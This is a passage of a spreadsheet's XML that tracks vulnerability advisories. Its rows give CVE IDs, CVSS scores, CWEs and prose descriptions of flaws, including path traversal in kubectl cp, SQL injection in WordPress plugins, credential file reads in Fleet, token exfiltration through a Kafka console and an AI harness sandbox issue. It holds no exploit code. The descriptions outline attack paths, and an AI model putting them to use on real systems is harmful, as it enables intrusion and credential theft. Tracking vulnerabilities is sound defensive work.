On v4.3.0 an application that keeps a listening TCP socket open across repeated link-down events is sufficient to reach the defect; the triggering condition is a network-interface state change, not attacker-supplied packet data, so the practical attacker is one able to force the link down repeatedly (for example an adjacent attacker disrupting a wireless link) or one with local/physical access. Because both the faulting address and the stored data are fixed small constants derived from the errno value, the outcome is a wild-pointer access leading to a kernel fatal error — a denial of service (device crash or reset) rather than an attacker-directed memory corruption.
The fix stores the pending error in a dedicated net_context.sock_error field and converts every producer and consumer to sock_set_error()/sock_get_error(), leaving user_data untouched. As a side effect it also stops getsockopt(SO_ERROR) — which is evaluated unconditionally — from returning the kernel address held in user_data to a userspace application.</t>
        </is>
      </c>
      <c r="T167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18417</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19444</t>
        </is>
      </c>
      <c r="D168" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F168" s="5" t="inlineStr">
        <is>
          <t>jordan@liggitt.net</t>
        </is>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr"/>
      <c r="J168" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K168" s="5" t="inlineStr"/>
      <c r="L168" s="5" t="inlineStr"/>
      <c r="M168" s="5" t="inlineStr"/>
      <c r="N168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P168" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q168" s="5" t="inlineStr"/>
      <c r="R168" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S168" s="5" t="inlineStr">
        <is>
          <t>A path traversal vulnerability was discovered in the Kubernetes kubectl client's kubectl cp command on Windows. When copying files from a container, kubectl runs tar inside the container to build a tar archive, transfers it over the network, and unpacks it on the local machine. If the tar binary in the container is malicious, it can execute arbitrary code and emit unexpected output, allowing an attacker who controls container contents to write files to arbitrary paths on the user's local machine when kubectl cp is invoked, limited only by the system permissions of the local user. This issue only affects kubectl clients running on Windows.</t>
        </is>
      </c>
      <c r="T168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19444</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82385</t>
        </is>
      </c>
      <c r="D169" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F169" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr"/>
      <c r="J169" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K169" s="5" t="inlineStr"/>
      <c r="L169" s="5" t="inlineStr"/>
      <c r="M169" s="5" t="inlineStr"/>
      <c r="N169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P169" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q169" s="5" t="inlineStr"/>
      <c r="R169" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S169" s="5" t="inlineStr">
        <is>
          <t>Exposure of Sensitive Information to an Unauthorized Actor in Apache Roller 6.1.5 allows a weblog administrator to read files on the application classpath, including Roller configuration files containing secrets, by authoring a Velocity template that uses an include directive to load a classpath resource outside the theme namespace. Roller treats weblog administrators as untrusted and enables a Velocity sandbox, but the include and parse directives are not confined by it. No non-default configuration is required; this affects any weblog whose administrator can author templates. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which confines includes to the active theme and removes classpath resource loading from weblog rendering.</t>
        </is>
      </c>
      <c r="T169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82385</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82915</t>
        </is>
      </c>
      <c r="D170" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F170" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr"/>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr"/>
      <c r="L170" s="5" t="inlineStr"/>
      <c r="M170" s="5" t="inlineStr"/>
      <c r="N170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P170" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q170" s="5" t="inlineStr"/>
      <c r="R170" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S170" s="5" t="inlineStr">
        <is>
          <t>Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Path Traversal.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82915</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84744</t>
        </is>
      </c>
      <c r="D171" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F171" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr"/>
      <c r="J171" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K171" s="5" t="inlineStr"/>
      <c r="L171" s="5" t="inlineStr"/>
      <c r="M171" s="5" t="inlineStr"/>
      <c r="N171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P171" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q171" s="5" t="inlineStr"/>
      <c r="R171" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S171" s="5" t="inlineStr">
        <is>
          <t>The WPForms Lite WordPress plugin from 1.5.0.1 to 2.0.2 does not remove shortcode delimiters from submitted field values before writing them back into the rendered form, allowing unauthenticated users to execute arbitrary shortcodes registered on the site and read the details of attachments belonging to non-public posts.</t>
        </is>
      </c>
      <c r="T171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84744</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93537</t>
        </is>
      </c>
      <c r="D172" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F172" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G172" s="5" t="inlineStr"/>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr"/>
      <c r="J172" s="5" t="inlineStr">
        <is>
          <t>kubernetes, suse</t>
        </is>
      </c>
      <c r="K172" s="5" t="inlineStr"/>
      <c r="L172" s="5" t="inlineStr"/>
      <c r="M172" s="5" t="inlineStr"/>
      <c r="N172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P172" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q172" s="5" t="inlineStr"/>
      <c r="R172" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="S172" s="5" t="inlineStr">
        <is>
          <t>A user who can supply bundle content to a repository referenced by a GitRepo resource, for example through Git push access, or through permission to create or modify a GitRepo, can cause SUSE Rancher Fleet to read files from the filesystem of the environment that processes the bundle and include their contents in the generated Bundle resource. This can expose configuration or credential material that the user has no Kubernetes RBAC permission to read, including Helm registry credentials made available to the bundle-processing job when per-path Helm credentials are configured.
This affects Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16, 0.12 before 0.12.20 and potentially older unsupported versions.</t>
        </is>
      </c>
      <c r="T172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93537</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93540</t>
        </is>
      </c>
      <c r="D173" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F173" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr"/>
      <c r="J173" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K173" s="5" t="inlineStr"/>
      <c r="L173" s="5" t="inlineStr"/>
      <c r="M173" s="5" t="inlineStr"/>
      <c r="N173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P173" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q173" s="5" t="inlineStr"/>
      <c r="R173" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="S173" s="5" t="inlineStr">
        <is>
          <t>A privilege mismatch was found in Fleet. When a bundle requested namespace labels or annotations through the namespaceLabels and namespaceAnnotations options, the resulting namespace metadata update was not subject to the same authorization as the rest of the bundle's deployment. As a result, a bundle could change labels and annotations on a target namespace even when the identity it was pinned to was not authorized to modify that namespace.
This affected SUSE Rancher Fleet 0.16 before 0.16.2, 0.15 before 0.15.7, 0.14 before 0.14.11, 0.13 before 0.13.16 and potentially older versions.</t>
        </is>
      </c>
      <c r="T173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93540</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94283</t>
        </is>
      </c>
      <c r="D174" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F174" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G174" s="5" t="inlineStr"/>
      <c r="H174" s="5" t="inlineStr"/>
      <c r="I174" s="5" t="inlineStr"/>
      <c r="J174" s="5" t="inlineStr"/>
      <c r="K174" s="5" t="inlineStr"/>
      <c r="L174" s="5" t="inlineStr"/>
      <c r="M174" s="5" t="inlineStr"/>
      <c r="N174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P174" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q174" s="5" t="inlineStr"/>
      <c r="R174" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S174" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in libX11's XIM (X Input Method) attribute parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94283</t>
        </is>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-96740</t>
        </is>
      </c>
      <c r="D175" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G175" s="5" t="inlineStr"/>
      <c r="H175" s="5" t="inlineStr"/>
      <c r="I175" s="5" t="inlineStr"/>
      <c r="J175" s="5" t="inlineStr"/>
      <c r="K175" s="5" t="inlineStr"/>
      <c r="L175" s="5" t="inlineStr"/>
      <c r="M175" s="5" t="inlineStr"/>
      <c r="N175" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P175" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q175" s="5" t="inlineStr"/>
      <c r="R175" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S175" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the StreamsHub Console for Apache Kafka. Tenant-supplied Kafka client properties from the Console custom resource are copied into the console-api AdminClient configuration without filtering security-sensitive keys, allowing a Console CR author to set config.providers and bootstrap.servers to exfiltrate the console-api ServiceAccount token to an attacker-controlled broker.</t>
        </is>
      </c>
      <c r="T175" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-96740</t>
        </is>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B176" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C176" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82930</t>
        </is>
      </c>
      <c r="D176" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E176" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F176" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G176" s="5" t="inlineStr"/>
      <c r="H176" s="5" t="inlineStr"/>
      <c r="I176" s="5" t="inlineStr"/>
      <c r="J176" s="5" t="inlineStr"/>
      <c r="K176" s="5" t="inlineStr"/>
      <c r="L176" s="5" t="inlineStr"/>
      <c r="M176" s="5" t="inlineStr"/>
      <c r="N176" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P176" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q176" s="5" t="inlineStr"/>
      <c r="R176" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S176" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module does not verify tokens in its authorization middleware, leaving all HTTP API and WebSocket endpoints accessible without authentication. An unauthenticated attacker on the LAN can query these endpoints, access system information, and send raw control commands to manipulate building automation devices.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T176" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82930</t>
        </is>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B177" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C177" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89303</t>
        </is>
      </c>
      <c r="D177" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E177" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F177" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G177" s="5" t="inlineStr"/>
      <c r="H177" s="5" t="inlineStr"/>
      <c r="I177" s="5" t="inlineStr"/>
      <c r="J177" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K177" s="5" t="inlineStr"/>
      <c r="L177" s="5" t="inlineStr"/>
      <c r="M177" s="5" t="inlineStr"/>
      <c r="N177" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P177" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q177" s="5" t="inlineStr"/>
      <c r="R177" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S177" s="5" t="inlineStr">
        <is>
          <t>The Post Voting System WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL query, allowing any authenticated user to perform SQL injection attacks.</t>
        </is>
      </c>
      <c r="T177" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89303</t>
        </is>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B178" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C178" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101102</t>
        </is>
      </c>
      <c r="D178" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E178" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G178" s="5" t="inlineStr"/>
      <c r="H178" s="5" t="inlineStr"/>
      <c r="I178" s="5" t="inlineStr"/>
      <c r="J178" s="5" t="inlineStr"/>
      <c r="K178" s="5" t="inlineStr"/>
      <c r="L178" s="5" t="inlineStr"/>
      <c r="M178" s="5" t="inlineStr"/>
      <c r="N178" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P178" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q178" s="5" t="inlineStr"/>
      <c r="R178" s="5" t="inlineStr">
        <is>
          <t>CWE-264, CWE-265</t>
        </is>
      </c>
      <c r="S178" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in deepseek-ai deepseek-harness up to 0.1.0-rc.7. Impacted is the function run_code of the component Code Mode Sandbox. The manipulation results in sandbox issue. The attack can be executed remotely. The vendor's own code, SAFETY.md, and design notes all explicitly state the worker is "containment, not a security boundary". The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T178" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101102</t>
        </is>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B179" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C179" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101105</t>
        </is>
      </c>
      <c r="D179" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E179" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G179" s="5" t="inlineStr"/>
      <c r="H179" s="5" t="inlineStr"/>
      <c r="I179" s="5" t="inlineStr"/>
      <c r="J179" s="5" t="inlineStr"/>
      <c r="K179" s="5" t="inlineStr"/>
      <c r="L179" s="5" t="inlineStr"/>
      <c r="M179" s="5" t="inlineStr"/>
      <c r="N179" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P179" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q179" s="5" t="inlineStr"/>
      <c r="R179" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S179" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in code-projects Matrimonial System 1.0. The affected element is the function processprofile_form of the file /create_profile of the component Profile Creation Endpoint. This manipulation of the argument fname causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized.</t>
        </is>
      </c>
      <c r="T179" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101105</t>
        </is>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B180" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C180" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101142</t>
        </is>
      </c>
      <c r="D180" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E180" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G180" s="5" t="inlineStr"/>
      <c r="H180" s="5" t="inlineStr"/>
      <c r="I180" s="5" t="inlineStr"/>
      <c r="J180" s="5" t="inlineStr"/>
      <c r="K180" s="5" t="inlineStr"/>
      <c r="L180" s="5" t="inlineStr"/>
      <c r="M180" s="5" t="inlineStr"/>
      <c r="N180" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P180" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q180" s="5" t="inlineStr"/>
      <c r="R180" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S180" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in Eleveo Quality Management 9.7.0. Affected by this vulnerability is an unknown functionality of the file Scorecard.jsp of the component Questionnaire Audio Upload. The manipulation leads to path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T180" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101142</t>
        </is>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B181" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C181" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101144</t>
        </is>
      </c>
      <c r="D181" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E181" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G181" s="5" t="inlineStr"/>
      <c r="H181" s="5" t="inlineStr"/>
      <c r="I181" s="5" t="inlineStr"/>
      <c r="J181" s="5" t="inlineStr"/>
      <c r="K181" s="5" t="inlineStr"/>
      <c r="L181" s="5" t="inlineStr"/>
      <c r="M181" s="5" t="inlineStr"/>
      <c r="N181" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P181" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q181" s="5" t="inlineStr"/>
      <c r="R181" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-284</t>
        </is>
      </c>
      <c r="S181" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Eleveo Call Recording Software 9.7.0. This affects an unknown part of the file /callrec/searchAction.do of the component Query Builder. This manipulation causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T181" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101144</t>
        </is>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B182" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C182" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101202</t>
        </is>
      </c>
      <c r="D182" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E182" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G182" s="5" t="inlineStr"/>
      <c r="H182" s="5" t="inlineStr"/>
      <c r="I182" s="5" t="inlineStr"/>
      <c r="J182" s="5" t="inlineStr"/>
      <c r="K182" s="5" t="inlineStr"/>
      <c r="L182" s="5" t="inlineStr"/>
      <c r="M182" s="5" t="inlineStr"/>
      <c r="N182" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P182" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q182" s="5" t="inlineStr"/>
      <c r="R182" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S182" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in FastStone Image Viewer up to 8.3. The affected element is an unknown function of the component TGA Image Handler. Executing a manipulation can lead to out-of-bounds write. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T182" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101202</t>
        </is>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B183" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C183" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101203</t>
        </is>
      </c>
      <c r="D183" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E183" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
